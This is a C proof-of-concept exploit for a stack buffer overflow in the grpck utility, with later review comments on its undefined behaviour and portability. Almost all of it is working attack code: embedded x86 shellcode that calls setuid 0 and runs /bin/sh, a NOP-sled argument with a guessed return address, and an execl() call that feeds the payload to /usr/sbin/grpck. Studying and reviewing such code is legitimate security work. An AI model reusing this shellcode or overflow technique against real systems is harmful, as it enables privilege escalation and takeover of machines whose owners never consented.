/* GRPCK-exploit by bob
 *  
 * This code is proof-of-concept.
 * 
 * By default grpck is not setuid, so
 * you cannot get root privileges from
 * this exploit.
 *
 * I did not FIND this exploit.
 * This exploit is to be used in conjunction
 * with bofs4kidsPII.txt
 *
 * bob@dtors.net
 */

#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>

/* Raw payload bytes that main() copies into the argument handed to
 * grpck. Only the first line is annotated by the author; the string
 * ends in the literal path "/bin/sh". The escape sequences as written
 * contain no "\x00", so strlen() in main() measures the whole array. */
char shellcode[] = 
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" //setuid 0
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
"\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";


/* Returns the current stack pointer -- on 32-bit x86 only.
 *
 * NOTE(review): there is no `return` statement. The caller receives a
 * value only because the inline asm leaves %esp in %eax and the i386
 * ABI returns integers in %eax. Falling off the end of a non-void
 * function and using the result is undefined behavior in C, and the
 * `movl %esp, %eax` instruction does not assemble on non-x86-32
 * targets, so this function is not portable in either sense. */
unsigned long get_sp(void) 

{
 __asm__("movl %esp, %eax");
}

/* Entry point of the proof-of-concept: builds one oversized argument
 * and passes it to /usr/sbin/grpck via execl().
 *
 * NOTE(review): several lines below are undefined behavior even on the
 * 32-bit x86 target that get_sp() assumes; see the inline notes.
 * argc and argv are unused. */
int main(int argc, char **argv) {

  int bsize  = 2188;    /* argument length; rounded up to a multiple of 4 below */
  

  unsigned long addr;   /* value returned by get_sp() */
  char *buff;           /* heap buffer of bsize bytes; never freed (exec replaces the image) */
  int i;

  if (bsize % 4 != 0) {

  bsize = bsize + 4 - (bsize % 4); } 

  buff  = (char *)malloc(bsize);   /* NOTE(review): result is not checked for NULL */
  addr  = get_sp(); 
  
    fprintf(stderr, "( ( g r p c k - e x p l o i t ) )\n"); 
    fprintf(stderr, "         b y  - b o b\n\n");
    /* NOTE(review): %x expects unsigned int, but addr is unsigned long;
     * %lx is the matching conversion. */
    fprintf(stderr, "Return Address: 0x%x\n", addr);
    fprintf(stderr, "Buffer Size: %d\n", bsize);
    

  /* Fill loop. Each iteration stores a whole `long` (4 bytes on the
   * assumed i386 target) at byte offset i, so the stores are both
   * misaligned and overlapping, and the last three iterations write
   * past the end of the bsize-byte allocation -- a heap overrun in the
   * PoC itself. Net effect within buff[0..bsize-1]: every byte is 0x90. */
  for(i = 0; i < bsize; i++) 
	{
      	*(long *)&buff[i] = 0x90;
	}
  /* Overwrite the last 4 bytes with addr (same `long`-through-char* idiom). */
  *(long *)&buff[bsize - 4] = addr;
/* NOTE(review): memcpy and strlen are declared in <string.h>, not the
 * <strings.h> this file includes, so both are implicitly declared here
 * (a hard error under C99 and later). Nothing visible writes a NUL
 * inside the bsize bytes, so the terminator execl() needs for argv[1]
 * presumably comes from the zero bytes the fill loop wrote out of
 * bounds -- confirm. */
memcpy(buff + bsize - strlen(shellcode) - 8, shellcode, strlen(shellcode));


  /* NOTE(review): execl() returns only on failure; that case falls
   * through to `return 0` without reporting errno. */
  execl("/usr/sbin/grpck", "grpck", buff, NULL);

return 0;
}

